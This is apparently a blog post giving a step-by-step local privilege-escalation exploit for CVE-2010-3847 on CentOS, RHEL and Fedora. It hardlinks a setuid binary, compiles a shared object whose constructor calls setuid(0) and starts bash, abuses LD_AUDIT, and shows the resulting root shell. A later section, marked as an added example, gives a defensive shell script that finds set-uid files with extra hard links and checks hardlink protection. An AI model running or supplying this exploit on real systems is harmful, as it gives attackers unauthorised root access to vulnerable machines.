Category: LINUX

2010-11-02 15:39:07

CVE-2010-3847 privilege escalation
CentOS5/RHEL5/Fedora13 all appear to be affected

Straight to the procedure:
[yinyin@CentOS ~]$ mkdir /tmp/exploit
[yinyin@CentOS ~]$ ln /bin/ping /tmp/exploit/target
[yinyin@CentOS ~]$ exec 3< /tmp/exploit/target
[yinyin@CentOS ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 leif leif 64 Oct 20 10:00 /proc/31911/fd/3 -> /tmp/exploit/target
[yinyin@CentOS ~]$ rm -rf /tmp/exploit/
[yinyin@CentOS ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 leif leif 64 Oct 20 10:00 /proc/31911/fd/3 -> /tmp/exploit/target (deleted)

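[yinyin@CentOS ~]$ vi payload.c
Press a to enter insert mode and type:
#include <stdlib.h>
#include <unistd.h>

/* Runs as a constructor when the dynamic loader loads this object. */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
Save with the :x or :wq command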
[yinyin@CentOS ~]$ ls
payload.c
[yinyin@CentOS ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[yinyin@CentOS ~]$ ls -l /tmp/exploit
-rwxrwxr-x 1 leif leif 4223 Oct 20 10:01 /tmp/exploit
[yinyin@CentOS ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@CentOS ~]# whoami
root
[root@CentOS ~]# id
uid=0(root) gid=503(xxoo) groups=503(xxoo)
[root@CentOS ~]# lsb_release -a
LSB Version: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.4 (Final)
Release: 5.4
Codename: Final
[root@CentOS ~]# uname -a
Linux CentOS1 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux
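
A defender's check for the state the first step of this session creates, as an added example that is not part of the original post: it lists set-uid or set-gid files that have more than one hard link and reports the kernel's fs.protected_hardlinks setting. The function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# find_privileged_hardlinks DIR...
# Prints the path of every regular file under DIR that carries the set-uid
# or set-gid bit and has more than one hard link. That is the state left by
# a command such as "ln /bin/ping /tmp/exploit/target" in the session above.
# -xdev keeps the walk on each DIR's own filesystem, since hard links cannot
# cross filesystems.
find_privileged_hardlinks() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -links +1 -print
}

# hardlink_protection_state [FILE]
# Prints the value of the fs.protected_hardlinks sysctl: 1 means the kernel
# refuses hard links to files the caller neither owns nor can read and write,
# 0 means such links are allowed. Prints "unknown" when the sysctl file is
# absent, as on kernels that predate it (Linux 3.6 introduced it).
# FILE defaults to the real sysctl path; the argument exists so the function
# can be exercised against a constructed file.
hardlink_protection_state() {
    if [ -r "${1:-/proc/sys/fs/protected_hardlinks}" ]; then
        cat "${1:-/proc/sys/fs/protected_hardlinks}"
    else
        echo unknown
    fi
}
```

Run `find_privileged_hardlinks` over user-writable directories that share a filesystem with system binaries, and treat any path it prints outside the package-managed locations as worth investigating.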